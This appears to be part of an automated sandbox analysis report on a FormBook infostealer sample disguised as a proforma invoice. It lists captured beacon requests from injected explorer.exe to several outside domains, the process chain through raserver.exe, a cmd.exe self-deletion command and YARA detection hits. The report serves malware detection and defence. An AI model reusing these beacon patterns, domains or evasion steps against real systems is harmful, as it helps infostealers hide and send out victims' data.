                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    3192.168.2.449759162.0.229.10880C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jun 10, 2021 14:37:05.328807116 CEST4666OUTGET /dp3a/?GR-d=gKBh5mJw+OBG/cLQbNfpnnQYqc+45jCeSmhHkERkUIltQJh3+jBq8zykiXiJ5ld+SMHF&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1
                                                                                                    Host: www.closetofaurora.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:37:05.531295061 CEST4668INHTTP/1.1 404 Not Found
                                                                                                    date: Thu, 10 Jun 2021 12:37:05 GMT
                                                                                                    server: Apache
                                                                                                    accept-ranges: bytes
                                                                                                    transfer-encoding: chunked
                                                                                                    content-type: text/html
                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                    x-xss-protection: 1; mode=block
                                                                                                    x-content-type-options: nosniff
                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                    connection: close
                                                                                                    Data Raw: 31 35 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 0d 0a 32 30 30 42 0d 0a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43
                                                                                                    Data Ascii: 15D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404200B Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    4192.168.2.44976023.227.38.7480C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jun 10, 2021 14:37:10.715167999 CEST4680OUTGET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H HTTP/1.1
                                                                                                    Host: www.28ji.site
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:37:10.805521011 CEST4681INHTTP/1.1 403 Forbidden
                                                                                                    Date: Thu, 10 Jun 2021 12:37:10 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Sorting-Hat-PodId: 160
                                                                                                    X-Sorting-Hat-ShopId: 47463563425
                                                                                                    X-Dc: gcp-europe-west1
                                                                                                    X-Request-ID: 9f2c5d5b-dde7-4da0-8843-84d5dbd26aac
                                                                                                    X-Permitted-Cross-Domain-Policies: none
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    X-Download-Options: noopen
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                    cf-request-id: 0a97863fde00000742bdb5b000000001
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 65d2a6462ab00742-FRA
                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                    Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30
                                                                                                    Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    5192.168.2.44976369.162.102.21880C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jun 10, 2021 14:37:17.004250050 CEST4705OUTGET /dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1
                                                                                                    Host: www.kingguardgroup.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:37:17.173516035 CEST4706INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 10 Jun 2021 12:37:17 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    6192.168.2.44976435.205.61.6780C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jun 10, 2021 14:37:27.645236969 CEST4707OUTGET /dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1
                                                                                                    Host: www.rebeccannemontgomery.net
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:37:27.931746006 CEST4708INHTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 10 Jun 2021 12:37:27 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Connection: close
                                                                                                    Set-Cookie: btst=946a4907f7d43076dd648d064a34f63b|84.17.52.18|1623328647|1623328647|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                    Location: 1


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    7192.168.2.44976537.48.65.14880C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jun 10, 2021 14:37:33.101150036 CEST4709OUTGET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ HTTP/1.1
                                                                                                    Host: www.pecon.pro
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Jun 10, 2021 14:37:33.930744886 CEST4709INHTTP/1.1 302 Found
                                                                                                    cache-control: max-age=0, private, must-revalidate
                                                                                                    connection: close
                                                                                                    content-length: 11
                                                                                                    date: Thu, 10 Jun 2021 12:37:32 GMT
                                                                                                    location: http://survey-smiles.com
                                                                                                    server: nginx
                                                                                                    set-cookie: sid=a0bf6c34-c9e8-11eb-8de8-c4010263fd46; path=/; domain=.pecon.pro; expires=Tue, 28 Jun 2089 15:51:40 GMT; max-age=2147483647; HttpOnly
                                                                                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                                    Data Ascii: Redirecting


                                                                                                    Code Manipulations

                                                                                                    Statistics

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Start time:14:35:28
                                                                                                    Start date:10/06/2021
                                                                                                    Path:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
                                                                                                    Imagebase:0x400000
                                                                                                    File size:223620 bytes
                                                                                                    MD5 hash:B148AE414EB8A1B34A15CDB32C21F9EE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    Reputation:low

                                                                                                    General

                                                                                                    Start time:14:35:29
                                                                                                    Start date:10/06/2021
                                                                                                    Path:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
                                                                                                    Imagebase:0x400000
                                                                                                    File size:223620 bytes
                                                                                                    MD5 hash:B148AE414EB8A1B34A15CDB32C21F9EE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    Reputation:low

                                                                                                    General

                                                                                                    Start time:14:35:35
                                                                                                    Start date:10/06/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:
                                                                                                    Imagebase:0x7ff6fee60000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:35:53
                                                                                                    Start date:10/06/2021
                                                                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                    Imagebase:0xae0000
                                                                                                    File size:108544 bytes
                                                                                                    MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    Reputation:moderate

                                                                                                    General

                                                                                                    Start time:14:35:57
                                                                                                    Start date:10/06/2021
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:/c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
                                                                                                    Imagebase:0x11d0000
                                                                                                    File size:232960 bytes
                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:35:58
                                                                                                    Start date:10/06/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff724c50000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Disassembly

                                                                                                    Code Analysis

                                                                                                    Reset < >